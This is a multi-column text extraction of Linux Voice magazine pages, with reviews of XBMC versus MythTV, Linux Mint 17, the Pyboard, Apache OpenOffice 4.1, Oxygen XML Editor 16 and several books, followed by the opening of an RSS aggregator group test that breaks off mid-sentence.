– it’s just that in order to upgrade them,
the organisation will need to buy more
Windows 8 licences. So the machines
are useless, which is why they’re
heading our way. That’s perfectly
                                                 Pyboard                                   OpenOffice 4.1                  Oxygen 16
usable hardware, which the IT chappie            Les Pounder’s inner child                 The #1 office suite for Linux   … or Oxygen XML Editor 16,
acknowledges is perfectly good. It’s just        squealed with joy for this                used to be OpenOffice –         to give it its full name,
that, in the parlance of consumer IT, it         microcontroller featuring a               then it forked to spawn         which describes what it
has become ‘obsolete’. What a shame.             built-in accelerometer, for               LibreOffice. Ben Everard        does. Graham Morrison
What a waste. The cycle continues, and           all your quadcopter                       finds out whether it still      finds out whether it’s worth
it’s only by a stroke of luck that these         drone-building needs.                     cuts the mustard.               the $488 price tag.
precious bundles of copper, plastic and
rare metals aren’t going into a skip.
                                                BOOKS AND GROUP TEST
Visions of Vista
                                                So much of our media is owned by a handful of
I’m keeping a fresh install of Vista on
                                                proprietors that it’s hard to get a view of what’s really
there because I’m curious. I’d like to see      going on in the world. The BBC never reports on the
how fast it boots when it’s fresh, and          changes that are going on in the NHS, for instance,
how that compares to a week, a month,           perhaps (though we couldn’t possible comment)
six months down the line. We all know           because it doesn’t want to bite the governmental
                                                hand that feeds it. This is why RSS is important. With
that Linux is safer, faster and more
                                                the right aggregator you can create your own news
reliable than other operating systems,          feed, without all the intrusive advertising, monitoring
and this is an ideal chance to prove it         and propaganda. And in Book Reviews the paranoia
and have some fun in the process.               continues, with more japes from our pals at the NSA!
andrew@linuxvoice.com



                                                                   www.linuxvoice.com                                                                     45
     REVIEWS XBMC VS MYTHTV



XBMC vs MythTV
Graham Morrison dims the lights, gets the popcorn and settles down for
the Clash of the Linux Media Player Titans.

                              F
                                        ive or six years ago, coercing desktop Linux
  DATA                                  into some kind of television recording, music
  MythTV 0.27.1
                                        playing, video watching set-top-box was a
  Web mythtv.org               lifestyle choice. It took so much time and continual
  Developer Isaac Richards     effort that you were spared the pain of watching the
  Licence GPLv2                rubbish you were recording. The main offender was
                               MythTV, an application worthy of the much overused
  XBMC 13.1
  Web http://xbmc.org
                               word ‘behemoth’. It’s a monstrous creature that only
  Developer Team XBMC          time and respect can calm; wonderful and frustrating,
  Licence GPLv2                complex and powerful in equal dosage.
                                   XBMC isn’t a new pretender to the crown, nor is it        New skins can be downloaded and installed in MythTV,
                               a direct replacement for MythTV, but it has become            but you may need to reconfigure menus separately.
                               a more attractive alternative for many of us. It’s
                               also been around for many years, famously taking              movies, photos, music and other media. This part is
                               its name from the Xbox games console it originally            most similar to XBMC.
                               subverted, and XBMC is now a very polished, very                 XBMC can also be expanded through the addition
                               modular media centre that runs on many different              of many plugins, but by default, it will access your
                               platforms, and it always manages to look great and            photos, movies and music collections through a
                               perform effortlessly. More importantly, it doesn’t            television-friendly interface. While it doesn’t offer the
                                                                    suffer any of the old    same functionality as MythTV’s back-end directly,

“XBMC has been designed to                                          analogue cruft that
                                                                    can hold MythTV
                                                                                             XBMC has been designed to work with third-party
                                                                                             recording and scheduling servers that turn it into
work with third-party recording                                     back. So when both       a fully fledged television recording solution. One of

and scheduling servers.”                                            projects pushed
                                                                    out major releases
                                                                                             those servers can even be the MythTV back-end, if
                                                                                             that’s not too confusing, although most people have
                                                                    within weeks of          migrated away to TVheadend.
                               each other, we couldn’t resist the opportunity to pit            One of the biggest problems with MythTV is
                               them both against one another.                                configuring the back-end. You need to get your
                                                                                             hardware working, navigate database configuration
                               Front-end to front-end                                        and permissions and understand the nature of the
                               MythTV is a complete digital television recording             broadcasts that you want to capture. There’s no
                               solution that’s split into two parts: one part handles        one-click option for Freeview or Freesat in the UK, for
                               the recording hardware and the scheduling of the              example, and there’s very little help within the tools.
                               recordings, while the other part runs on the hardware
                               connected to your television. These are known as the          Hardware decoding
                               back-end and the front-end respectively, and you can          All of which leads us to XBMC and MythTV’s front-
                               have more than one front-end connected to more than           ends. Both can be installed with very little fuss and
                               one back-end. The front-end can also be augmented             very few dependencies. Thanks to XBMC’s popularity,
                               through plugins, and can be made to access your               and the fact it originated on a system with a decent




MythTV (left) can look very good, but XBMC always seems to look better – mainly thanks to its composited and unified rendering engine.



46                                                              www.linuxvoice.com
                                                                                                                    XBMC VS MYTHTV REVIEWS


  Live TV
  MythTV has the ability to play live TV at its core, while XMBC     a thumbnail, or compositing it behind the EPG, and MythTV
  can add much of the same functionality through a plugin            can’t touch it for these features, which becomes an important
  (we tested both the TVheadend and Mythtvback-end PVR               feature if you’re using one of these as your main TV. XBMC
  back-ends). Navigating the plugins list can be tricky, and we      also works much better in windowed mode, which is essential
  encountered a bug in XBMC that enabled both plugins by             if you’re watching on your desktop while doing some work.
  mistake, but everything else worked. Pausing, rewinding and
  live recording on both XBMC and MythTV is almost identical,
  with XBMC having the advantage of a clearer interface.
      We’ve previously run MythTV for many years, and its
  scheduling and recording stability is peerless. But after a few
  months with XBMC and Tvheadend, we’ve encountered a few
  stability issues. Sometimes the connection to the back-end
  will be lost without reason, especially when rewinding through
  a remote buffer, and there feels more of a performance hit
  when you access the back-end over a network, but it still
  works well. We’ve watched and recorded SD and HD streams
  with stereo and multichannel audio, and both work excellently.
      One area in which XBMC really excels is with the integration
  of live video within the EPG and channel selector. The             MythTV supports interactive television in the UK, which
  accelerated UI makes short work of scaling the video into          may make the choice between them easier to make.


graphics card but only a 733 MHz CPU, it’s always                    pixels of video. MythTV’s user-interface has had
been able to make best use of graphics acceleration.                 something of an overhaul with recent versions, and
It works well with OpenELEC running on a Raspberry                   we think this is thanks to competition from XBMC.
Pi, for instance, and we’ve had a great experience                   MythUI is the framework, and it now takes advantage
running the latest builds on the Matrix ARM mini-PC,                 of OpenGL and Qt accelerated rendering. The results
although those builds are curated and customised by                  can be excellent, and our favourite theme – MythAeon
Matrix themselves to make best use of the hardware.                  – takes inspiration from XBMC’s original skin. But it’s
Version 13 also adds hardware decoding to a variety                  more detached from playback than XBMC, which can
of Android device, most notably the Amazon Fire TV                   composite the video behind the GUI or access many
and the OUYA, so a diminutive, silent ARM-powered                    of the same user-interface elements whilst playing
media player is a definite possibility with XBMC.                    media. XBMC is also much better at juggling the video
MythTV’s hardware deciding isn’t so advanced.                        resolution with the native resolution of your display,
There’s none for the Raspberry Pi and we’ve had little               which helps dramatically with font quality and on-
success trying to create custom builds ourselves. This               screen rendering.
restricts the front-end to being an HTPC or a laptop, or                Having used both extensively over the last couple
possibly a SteamBox if you’re going to play Linux                    of weeks, and having previously been big fans of all
games anyway.                                                        things MythTV, we’re surprised and slightly saddened
                                                                     at just how much better XBMC has become. It
Hey good lookin’                                                     works on more hardware, it’s more accelerated
Getting around the interface of each depends on the                  and looks and behaves much more seamlessly.
skin being used. XBMC’s default has set the standard                 Its plugin architecture and playback options are
in GUI navigation for a television, and once you get                 easier to understand and it general feels much more
your head around its quirks and pseudo file-system                   modern. MythTV has the slight edge when it comes
approach to navigation, it’s easy to understand and                  to scheduling and stability, but that can be solved by
use. With decent hardware acceleration, even the                     using the MythTV back-end with XBMC. All things
Raspberry Pi can conjure up 1920x1080 composited                     considered, there’s no contest. XBMC has won.

                                                                       LINUX VOICE VERDICT
                                                                       XBMC It’s got a 3D user-interface.
                                                                       It’s got more plugins that you’ll ever
                                                                       need, and it runs on anything.


                                                                       MythTV Hasn’t developed rapidly
                                                                       enough to meet the competition, and
                                                                       while still unrivalled for stability, it’s
                                                                       getting left behind.
Apart from its appearance, the best thing about XBMC is the
number of plugins that can be added to make your system
even more awesome.


                                                                       www.linuxvoice.com                                                    47
     REVIEWS LINUX MINT 17



Linux Mint 17 Qiana
This new release of the world’s favourite desktop distro will be supported
until 2019 - unlike Roy Batty. Mike Saunders takes a look.

                                 T
                                          here used to be a time when the Linux desktop
  DATA                                    was a constantly in-progress revolution, with
  Web
                                          improvements and regressions flowing in at a
  www.linuxmint.com              breakneck rate, and each new distro release felt
  Developer                      substantially different to the one before. Those were
  The Linux Mint Team            good days, despite the number of installations and
  Price                          re-installations we all did, being desperate as we were
  Free to download
                                 to experience the cutting-edge of everything Linuxy.
                                     Mainstream desktop Linux has matured since then;
                                 it’s stable, it does a fantastic job, and most of us don’t
                                 need radical changes every six months. We just want
                                 things to work, and get out of the way, leaving us to
                                 use our applications. Clement Lefebvre, the lead
                                 developer of Linux Mint, really gets this – so version       The Update Manager now helps to distinguish between
                                 17 of his distro is rather conservative in nature.           backports, security fixes and other types of update.
                                     Mint 17 is a Long Term Support (LTS) release, based
                                 on Ubuntu 14.04. This means that it will receive             about packages to be installed, so you can see
                                 bugfixes and security patches until 2019, making it a        whether an update is a security fix or a backport of an
                                                                    good choice for           application. It’s also smoother in use, no longer waiting

“Clement Lefebvre and his                                           businesses and
                                                                    production
                                                                                              for NetworkManager or locking the APT cache.
                                                                                                The Driver Manager, meanwhile, can install drivers
team have refined the whole                                         environments. Lefebvre    without access to an internet connection – it can use

experience of using Linux Mint.”                                    has also changed
                                                                    Mint’s release strategy
                                                                                              the boot media instead. This is a sensible move,
                                                                                              because it enables many laptop users to get online
                                                                    going forward: the next   straight away, and not have to plug in an Ethernet
                                 major release, Mint 18, will be based on the next            cable and download Wi-Fi drivers separately.
                                 Ubuntu LTS version in 2016, while Mint 17.1, 17.2 etc
                                 will provide relatively small upgrades with newer            Efficiency gains
                                 versions of packages in the meantime. We really like         There’s now a single Language Settings tool that
                                 this approach – it provides long-term stability with         works across the Cinnamon, Mate and Xfce desktops,
                                 access to new applications periodically.                     while the Welcome screen no longer has to load
                                     As mentioned, there aren’t many whizz-bang new           WebKit libraries, so it starts more quickly and uses
Mint 17’s interface is largely   features in this release to coo over, but Lefebvre and       less RAM.
the same as in previous          his team have refined the overall experience of using            Desktop software-wise you’ll find Cinnamon 2.2.13,
releases (this screenshot
                                 Linux Mint. The Update Manager, for instance, has had        Mate 1.8, LibreOffice 4.2.3, Firefox 28, Thunderbird
shows the Cinnamon
desktop).                        an interface overhaul, providing more information            24.4, VLC 2.1.2 and Gimp 2.8.10. This is all built on a
                                                                                              base of kernel 3.13.0 and X.Org Server 1.15.1,
                                                                                              compiled with GCC 4.8.2. Of course, everything in the
                                                                                              Ubuntu 14.04 repositories is also available to Mint 17
                                                                                              users, and a lot of documentation can be shared
                                                                                              between the distros too.
                                                                                                  Mint 17 isn’t sexy or exciting, and if you’re a Mint 16
                                                                                              user you may be tempted to avoid the upgrade. But
                                                                                              it’s well worth it, both to get the latest software
                                                                                              updates, and to know you’ll be secure for many years
                                                                                              down the road.

                                                                                                LINUX VOICE VERDICT
                                                                                                Mature, reliable and with five years of
                                                                                                support ahead. It’s boring, but for an
                                                                                                LTS that’s exactly what we want.




48                                                               www.linuxvoice.com
                                                                                       MICRO PYTHON & PYBOARD REVIEWS



Micro Python & Pyboard
Is it an Arduino? Is it a Raspberry Pi? No it’s another prototyping platform, with a
built-in accelerometer. Les Pounder investigates.

T
         he success of open source hardware
         platforms had brought forth many new ideas
         and projects, and the newest kids on the block
are Pyboard and Micro Python. The project is the
brainchild of Damien George from Cambridge, and is a
tiny ARM microcontroller platform (the Pyboard),
which is programmed using a lean re-write of Python
3 (Micro Python).
   The board has two main ports: one for a micro USB
connection, the other for MicroSD cards, which can be
used to store your scripts. Next we can see a lot of
tiny holes in the board, which provide access to the
microcontroller and enable us to connect many
different types of electronic components. There are
also two microswitches: one is reserved for resetting
the board; and the other can be used in your projects.
Finally there are four small LEDs that are used to
show activity/power to the board, but which can also
be used in your projects.
   To program the board, you simply connect it to your
PC with a micro USB cable. After a few seconds the             The Pyboard measures just 33 x 40 mm and weighs 6g. There’s a tutorial at
inbuilt 1MiB flash storage is mounted and available for        http://tinyurl.com/o529no5 that illustrates how easy it can be to use it with a servo.
use. In the storage you will see four files, but the two
main files we are interested in boot.py and main.py. In        and Y direction, accessing our favourite feature of the
main.py we can write our own Python project using              Pyboard: its accelerometer. We then connected the                  DATA
our favourite editor, then save, eject the drive and reset     two LEDs, one to connection X1, the other to X12, as               Web
the board. Hey presto: your project is working! The            they were very near to ground (GND). It’s not hard to              http://micropython.org
inclusion of a micro SD slot enables you to add further        see this being adapted to create a quadcopter.                     Developer
programs to your board and save information such as              So where does the board fit into the vast sea of                 Damien George
                                                                                                                                  Price
sensor data to the card.                                       products already on the market? Whereas the
                                                                                                                                  £28 (On sale from July)
                                                               Raspberry Pi is a full computer, the Pyboard is a
Yes, but what can it do?                                       microcontroller in a similar vein to the Arduino
The board’s functionality is comparable to an Arduino,         platform, and we see it as an alternative to the Arduino
with connections for PWM (Pulse Width Modulation)              for those who are already competent with Python.
and analogue-to-digital conversion. For this review we         The use of the familiar Python language is a great
wrote a simple script called accel.py (https://github.         boost to the board, enabling anyone to quickly
com/lesp/Micro Python) that would illuminate two               prototype hardware projects.
LEDs based on how far the board was tilted in an X               The Pyboard is a remarkably well made piece of kit,
                                                               with lots of expandability and potential for great
                                                               projects. Couple this board with the lean
                                                               implementation of Python 3 that is Micro Python and
                                                               we have an alternative platform for Python-based
                                                               hardware hacking. With none of the overheads that a
                                                               Raspberry Pi has, by which we mean external devices
                                                               and peripherals. If you need a small board for a single
                                                               task then why not consider trying this on for size?

                                                                 LINUX VOICE VERDICT
                                                                 Great connectivity, small size and
                                                                 lovely Python make this a great
                                                                 alternative to the Pi and Arduino.

The main.py file is just a text file on the internal memory.



                                                                 www.linuxvoice.com                                                                         49
     REVIEWS APACHE OPENOFFICE 4.1



Apache OpenOffice 4.1
Once the poster child of open source software, OpenOffice has fallen behind in
recent times. It the latest release good enough for it to regain its lead?

                           O
                                    penOffice’s fall from prominence in the Linux
  DATA                              world has been dramatic. A few years ago it
  Web
                                    was in the standard installation of almost
  www.openoffice.org       every distro – but now it’s almost nowhere to be seen.
  Developer                After the highly publicised split from LibreOffice and
  The Apache Software      later move to the Apache Foundation, almost all Linux
  Foundation               users went with the new suite. However, on other
  Price
  Free under Apache
                           platforms, OpenOffice remains the dominant open
  Licence 2.0              source office suite. The project’s SourceForge page is
                           reporting over a million downloads per week, so while
                           OpenOffice may not be in the Linux spotlight at the
                           moment, it’s still one of the most widely used open
                           source projects.
                              Following its move to the Apache Foundation             3D charts now load quicker to help you confuse people
                           in 2011, and the release of versions 4.0 and 4.1,         faster with your pretty data.
                           OpenOffice has moved to a ‘release when it’s ready’
                           approach, so we don’t know when 4.2 will be available.    support for Microsoft Office’s document formats.
                              The main feature of 4.0 (released in July 2013) was    Although this improves with each release, it is still not
                                                            a re-worked sidebar.     perfect. Draw and Impress have had some graphical

“IBM has been taking an interest                            This came courtesy of
                                                            IBM, which has taken
                                                                                     tweaks to make them look better, while Base and
                                                                                     Math remain much as they’ve always been.
in the project since it stopped                             an interest in keeping
                                                                                     Getting better all the time
developing Lotus Symphony.”                                 the project moving
                                                            since it stopped         Performance has been another area of focus, and if
                                                            developing Lotus         your abiding memory of OpenOffice is a splash screen
                           Symphony. The most hyped feature of 4.1 is improved       that seemed to take forever to disappear, then you’ll
                           accessibility for blind users. However, this is only      find the latest version a pleasant surprise. On our
                           available for Windows users. Of course, these haven’t     main test machine, it took a couple of seconds to
                           been the only changes.                                    open Writer and be able to edit the document. Calc,
                              The suite consists of six applications: Writer (word   Impress, Math and Draw were similarly quick. Only
                           processor), Calc (spreadsheet), Impress (presentation     Base left us waiting. This was tested on a spanking
We had no problems         tool), Draw (vector drawing), Base (graphical             new machine with an i7 processor and an SSD, so to
writing this review in     database) and Math (formula tool).                        get a fairer picture, we fired up a six-year-old Centrino
OpenOffice, but that’s a      Writer and Calc have seen the most improvements.       powered laptop. From a cold start, this opened Writer
simple test.               Almost all of these have been in the form of better       in about seven seconds. While this is still a little longer
                                                                                     than we’d like, it’s quite impressive for an old machine.
                                                                                        Apache OpenOffice is improving with each release,
                                                                                     and it’s a perfectly capable office suite. However, the
                                                                                     improvements are quite small. Some other Linux
                                                                                     office suites are improving at a faster rate, and
                                                                                     OpenOffice is falling behind the competition. This is
                                                                                     only the second release since the project’s move from
                                                                                     Oracle, so if OpenOffice is to remain competitive, the
                                                                                     pace of improvements will have to increase. In Apache
                                                                                     and IBM, it has the backing of two organisations with
                                                                                     the capability to make this happen.

                                                                                       LINUX VOICE VERDICT
                                                                                       Better performance and support for
                                                                                       Microsoft formats, but little else to
                                                                                       get excited about in 4.1.




50                                                        www.linuxvoice.com
                                                                                            OXYGEN XML EDITOR 16 REVIEWS



Oxygen XML Editor 16
Graham Morrison always forgets to close his elements.
Fortunately, there’s an editor for that.

X
          ML is great. It makes content easier to work
          with. It gives content a structure while
          keeping it as plain text that you always have
complete control over. Unfortunately though, it can be
painful to edit in Vim or Emacs. So if you want to get
going on that user documentation you’ve been
meaning to tackle for a while, Oxygen XML Editor 16
might just give you the push you need.
    Depending on your needs, you can buy Oxygen
XML Developer, Author or Editor. Editor = Developer
+ Author, so we’re focusing on the all-encompassing
Oxygen XML Editor in this review. It’s expensive. But                                                                    And here’s single-sourcing
it’s not meant for mere mortals like us. It’s meant           this latest release of Oxygen, you can define colour       in action – PDF and
for technical writers fighting the good fight on the          and style to help highlight conditional text when          interactive HTML output
documentation front, and should be considered their           working in the visual mode.                                side-by-side from the same
equivalent to a decent development environment and               Say, for example, you have a topic that feeds into      XML source.
its associated licences and support.                          two guides: a developer guide and a user guide. Some
    Editor provides all the regular functionality you’d       of the content in that topic is for one audience, the
expect from a good XML editor: support for all the            system developers; some of the content is for the
schema languages, XML validation, XPath support               other audience, the end users, and some of the
and user-defined search scopes. But one of the big            content is for both audiences. Oxygen has always             DATA
strengths of Oxygen is its ability to output content          handled conditional text well, thanks to its solid build
                                                                                                                           Web
to the main delivery formats, including XHTML,                capabilities, but you can now visualise which bits of
                                                                                                                           www.oxygenxml.com
PDF, EPUB and Eclipse, all at the flick of a switch           content are aimed at which users, making it much             Developer
through its configurable transformation scenarios.            easier to hone that content for specific reader types.       SyncRO Soft Ltd
It also outputs DITA and DocBook content to its very                                                                       Price
own strain of WebHelp, which saves you cobbling               Writing like a windowpane                                    From US $488
                                                                                                                           Licence
together your own set of search and indexing tools to         Other cool features that have been added with the            Proprietary
accompany XHTML output. If, however, you want to              latest release are Quick Fix, to help solve common
automate your WebHelp builds for large projects, you          XSLT errors, cross-file XPath querying and an Ant build
need to pay for an additional hefty licence to be able        file editor. And, if you’re not CSS savvy, there’s now a
to use WebHelp from the command line.                         visual interface for creating them, which Oxygen calls
    As a content author, you can choose to see the text       its WebHelp Skin Builder. The Skin Builder helps you
version of your content, with XML tags highlighted            visually customise the style of your WebHelp interface
for easy reading and automatic element completion,            and then export the skin as a CSS file to use in your
or view it in visual authoring mode, which renders the        WebHelp transformation scenario. But remember,
content into a form more akin to its output state. In         your content needs to be stored in either the DITA or
                                                              DocBook framework to use Oxygen’s WebHelp.
                                                                 From what we’ve seen and heard, while these
                                                              additions could be rather handy to XML content
                                                              developers, it looks like they simply enhance an
                                                              already very powerful XML development environment
                                                              that’s backed up by a super responsive tech support
                                                              team. If you’re thinking of investing in a good XML
                                                              editor, and you’ve got the financial support to fund the
                                                              purchase, this has to be the one to go for!

                                                                LINUX VOICE VERDICT
                                                                One of the best XML editing tools
                                                                available. It’s expensive. But maybe
                                                                your IT department will be paying?
Conditional text highlighting helps you target content at
specific users. The blue text here is for expert users, for
example.

                                                                www.linuxvoice.com                                                              51
     REVIEWS BOOKS



No place to hide: Edward Snowden,
the NSA and the Surveillance State
Ben Everard bought this book in cash so GCHQ doesn’t know he read it…

E
        ven before the Snowden revelations,          passion. However, when writing about a
        Glenn Greenwald had a history of             variety of subjects in 250 pages, there is
        writing about the US government’s            a risk that none of them will be covered in
spying making him the perfect person to              sufficient detail. The detail of the history
lead the reporting on the subject.                   of the leaking stopped abruptly in Hong
   No Place to Hide is divided into five             Kong, so we don’t get to learn Greenwald’s
chapters. The first two are the story of how         perspective on Snowden’s exile in Russia.
Greenwald and Snowden met and began                      For anyone who feels they haven’t
working together. The subsequent chapters            followed the news as closely as they’d like,
each deal with different aspects of what             this is an good way to catch up, but there is
happened next. First, Greenwald talks about          little new material here.
what the leaks actually said about how
the governments of America and the UK
colluded to invade the privacy of a huge               LINUX VOICE VERDICT
proportion of the world’s citizens. Then he            Author Glenn Greenwald
goes on to look into the dangerous effect on           Publisher Hamish Hamilton
                                                       ISBN 978-0241146699
society such an invasion has, and finally he
                                                       Price £20
talks about the nature of the current media
                                                       An excellent recount of the Snowden saga, but
establishment on both sides of the pond.               it isn’t the explosive finale we had hoped for.
   These are all matters of deep importance                                                              No Place to Hide, other than – presumably –
to Greenwald, and he writes well and with                                                                Moscow Sheremetyevo Airport.




Head First JavaScript Programming
Graham Morrison is thinking of upgrading linuxvoice.com with a little JavaScript.


W
             e love O’Reilly’s Head First series,.   code about a third of the way through, before
             They’re nearly always brilliant         finishing up with prototypes and app
             and totally unlike the majority of      building. It’s a comprehensive and digestible
other books that try to teach you technical          overview. We sometimes have a problem
subjects. They’re visual, entertaining and           with the words – the section of functions
easy to read, and you’re never overwhelmed           has the title ‘getting functional’ which could
by data or source code. And while O’Reilly           be confusing, and there’s relatively little on
uses phrases like ‘multi-sensory’ and                JQuery or JSON. But that makes it perfect
‘cognitive science’ to explain its strategy, all     for its target audience, which is beginners.
we can really say is that it works. JavaScript       And it avoids the classic problem with
is particularly well suited to this approach.        beginners’ books, and that’s scaring off the
There are probably more non-programmers              audience. Good work.
programming in JavaScript than any other
language. And nearly all of them must be
using it to add interaction to websites, which         LINUX VOICE VERDICT
is the obvious target audience for this book.          Author Eric T Freeman and Elisabeth Robson
                                                       Publisher O’Reilly
                                                       ISBN 978-1449340131
The BASIC language of the web                          Price £38.50
Head First JavaScript assumes very little prior
                                                       If you can live with the West Coast bonhomie,
knowledge, and takes the reader from the               there’s no better book for JavaScript newbies     As much as we love the editorial style inside
humble beginnings of dealing with variables                                                              Head First books, we’ve a phobia against the
and loops, passing through object-oriented                                                               large heads and small feet on their covers.



52                                                                www.linuxvoice.com
                                                                                                                       REVIEWS BOOKS


Brew your own British Real Ale                                                                       ALSO RELEASED…
Need another excuse for a BrewPi? Graham Morrison finds 100



I
     f our BrewPi tutorial in LV001 has got
     you brewing your own (perfect!) beer,
     and you’re looking to move on from
kits, this is the perfect next step. Here’s a
book full of recipes for many of the most
popular ales found throughout the United                                                                                             Who’d have
Kingdom, from Black Sheep and Old                                                                                                    thought
Peculier, to Wadworth 6X to Arkell’s Mash                                                                                            WordPress
                                                                              Beer. The perfect
Tun Mild. What we like mostly about this                                                                                             would come
                                                                              prop for politicians
book is that it includes malt extract recipes                                                                                        so far?
                                                                              and Linux
alongside fully mashed recipes when the                                       journalists.           Building Web Apps with WordPress
ingredients make the extracts viable. This                                                           It’s no longer a humble blogging platform, and
can save several hours of effort and still       with a few cheaper brews first. But when            this book aims to take your use of WordPress
yield excellent results. We’re lazy brewers.     you’ve cracked the method, the results are          even further by writing plugins, using PHP and
                                                                                                     JQuery and even by developing native Android
                                                 awesome. Hic…
                                                                                                     and iOS apps.
Plato, they say, could stick it away...
What you won’t find is very much                   LINUX VOICE VERDICT
background information on how to                   Author Graham Wheeler
actually brew your beer, although the              Publisher Campaign for Real Ale
first couple of chapters give you enough           ISBN 978-1-85249-258-8
                                                   Price £14.99
details if you’ve already done a few kits.
                                                   A book with 100 beer recipes published by
Each recipe is little more than a list of          the Campaign for Real Ale. Enough said.
quantities, times and temperatures. For
this reason, we’d recommend practising
                                                                                                                                     Kivy, because
                                                                                                                                     all the good

An Astronaut’s Guide to Life On Earth                                                                                                names have
                                                                                                                                     been taken.

Ben Everard is going to be an astronaut when he grows up.                                            Creating apps in Kivy
                                                                                                     Is that a mule, a donkey or a horse? We’re not



A
                                                                                                     sure. But as this book is about Kivy, a mobile
          n Astronaut’s Guide to Life On Earth                                                       touch-based GUI framework for Python,
          is two narratives woven together.                                                          perhaps it’s been scared by the large snake
          One is a biography of an astronaut                                                         hiding in the undergrowth.
and the other is a self-help guide based
on that astronaut’s experiences at NASA
and CSA (Canadian Space Agency). The
biography part of the book manages to                                         Without gravity,
capture the majesty of space in a way that                                    how would a
will be familiar to anyone who’s watched                                      skateboarder stay
his popular videos on life in space. Of                                       on the board?
course, time in space counts for only a
small portion of any astronaut’s career          Linux Voice, our first issue would still be at
and this book also covers Hadfied as he          least 18 months away, by which point we
performs a wide range of duties from             would have run out of money (although if it
training to communications and robotics.         did arrive, it wouldn’t have any typos).                                            Keep it secret,
   The second narrative thread of this book                                                                                          keep it safe.
is less impressive. Hadfield exposes a view        LINUX VOICE VERDICT                               Learn Computer Architecture with RPi
that we should all follow NASA’s modus             Author Chris Hadfield                             What’s this we spy? A new book from Mr
operandi and focus on everything we do             Publisher Macmillan                               Everard and chums? Shhh… don’t tell anyone.
in excruciating detail. As he puts it: ‘sweat      ISBN 978-1447257103                               It’s not due out until the end of the year, but
                                                   Price £18.99                                      we love the idea of a modern version of the
the small stuff’. Unfortunately, we don’t all
                                                   Some parts are really enjoyable but the           Amiga Hardware Reference Manual.
have NASA’s budget or the luxury of being          book’s let down by impractical advice.
able to spend years preparing for a single
mission. If we had followed this guide at



                                                                 www.linuxvoice.com                                                                    53
     GROUP TEST RSS AGGREGATORS




         RSS
 AGGREGATORS
                 GROUP TEST
                 Marco Fioretti explores five different ways to get news
                 from the internet, and explains why you need RSS



 On Test                                             RSS Aggregators
                                                     All the news you want, without Big Brother.
 Akregator

                                                     T
                      URL www.kde.org                         his Group Test may be the          news you may want to see in one
                      Version 4.12.5                          most important you read            window, without jumping from
                      Licence GPL v2                          this year, because RSS is          website to website.
                      The aggregator from and        vital, both for you and for the web            The others are independence and
                      for the KDE desktop. Does      as a whole. Seriously.                      privacy. As long as all the websites
                      it work well even in other        RSS means Rich Site Summary              you care about publish RSS feeds
                      environments?                                                              and you use them, those websites
                                                     or, some say, Really Simple

 Liferea                                             Syndication. A standard RSS feed is
                                                     a plain text file that always contains
                                                                                                 don’t run the risk of seeing
                                                                                                 themselves penalised by private
                      URL http://lzone.de/           the latest headlines from the               search engines and social
                      liferea
                                                     website that publishes it. In               networks, which have their own
                      Version 1.10.8
                      Licence GPLv2+                 practice, an RSS feed may contain           scoring algorithms and priorities. At
                      A GTK, that is Gnome-          text and links to any kind of               the same time, you never become
                      oriented application with      resource, from local log files to           dependant on any external service
                      many features and plugins.     streamed music.                             (remember all the complaints last
                                                        RSS aggregators download the             year when Google Reader closed?
 Newsbeuter                                          feeds that their users want and             THAT is what we’re talking about!).
                      URL http://newsbeuter.org      present all their contents in one           Above all, nobody else gets (at least
                      Version 2.8                    coherent view, making it possible to        with self-hosted, web-based
                      Licence MIT                    read many stories from many                 aggregators) one single lists of all
                      This RSS aggregator for        sources, very efficiently.                  the “news” you like to read on a
                      the console is at least           The reasons why RSS is vital are         regular basis, so RSS can be a great
                      as rich in features as the     very simple. The most obvious, and          help in keeping the web a place of
                      others.                                                                    many independent publishers and
                                                     less important, is to save time: with
                                                     a good aggregator you get all the           readers. Please use RSS!
 QuiteRSS
                      URL http://quiterss.org
                      Version 0.15.4                 “In practice,an RSS feed may contain
                                                     text and links to any kind of resource.”
                      Licence GPLv3
                      A multiplatform
                      aggregator, with a flexible,
                      easy-to-use category and
                      tagging system.                  THE CRUCIAL CRITERIA
                                                       We wanted to make trying RSS              first category are the fastest, and may
 Tiny Tiny RSS                                         aggregators as easy as possible. This     be perfect for users with disabilities.
                      URL http://tt-rss.org            led us to exclude interesting packages    Web-based tools, instead, only have be
                                                       like SnowNews or RSSOwl, which            installed once to be usable from any
                      Version 1.12
                                                       seemed to be available as binary          browser, on any computer.
                      Licence: GPLv3
                                                       packages in the default repositories of       Other important criteria were
                      A web-based aggregator           fewer distributions than others.          active development, documentation,
                      ready for the cloud and              At the same time, we absolutely had   efficient news browsing and support
                      perfectly integrated with        to show you how many options you          for multimedia enclosures. Features
                      your main browser.               have, from command line aggregators       like news tagging were also tested, but
                                                       to web-based ones. Programs in the        treated as slightly less relevant.




54                                             www.linuxvoice.com
                                                                                               RSS AGGREGATORS GROUP TEST



Sharing feeds                                                                                     Multimedia
Can I pass interesting news to all my friends?                                                    Lots of stories don’t come as
                                                                                                  text. Can I still get them?


                                                                                                  N
                                                                                                            ews doesn’t have to be plain text.
                                                                                                            Therefore, an RSS aggregator that
                                                                                                            doesn’t know what to make of
                                                                                                  multimedia content is not worth much.
                                                                                                     As with other functionalities, Tiny Tiny RSS
                                                                                                  is the easiest contender to talk about. Since
                                                                                                  you must use it from a browser, you will
                                                                                                  access only the non-text content that your
                                                                                                  browser already knows how to handle.
                                                                                                     You may think that Newsbeuter, being a
                                                                                                  console application, would be even quicker to
                                                                                                  deal with, but you would be wrong, at least for
                                                                                                  audio and other content marked according to
                                                                                                  the Media RSS extension (www.rssboard.org/
                                                                                                  media-rss). As it happens, Newsbeuter is
                                                                                                  developed and distributed with a twin
                                                                                                  application called Podbeuter, which works
                                                                                                  both as a download manager and, above all,
                                                                                                  as a podcast player.
                                                                                                     Akregator, Liferea and QuiteRSS all
Liferea (in the back) knows how to submit links to tens of online communities. Tiny Tiny RSS      downloaded and played the audio podcast we
(front bottom) generates RSS feeds of all the news you want to share.                             tried from our test suite of feeds. Video
                                                                                                  playback depends on which combination of



G
         ood RSS aggregators can easily           when they are not available. A common           aggregator, Linux distro, installed multimedia
         pass single articles on many other       way is to create and manage OPML lists          codecs, configuration and content you want to
         channels with one click, as well as      or single, custom feeds with Tiny Tiny          manage. We cannot guarantee that any of the
whole lists of feeds.                             RSS, optionally protected by passwords,         desktop aggregators will be able to play
  The open standard called Outline                and then read them with any desktop-            whatever video you may find online. However,
Processor Markup Language (OPML,                  based aggregator. Newsbeuter and Liferea        there is a quick and dirty solution: whatever
http://dev.opml.org/spec2.html) was               support this integration with Tiny Tiny         your desktop aggregator is, tell it to pass the
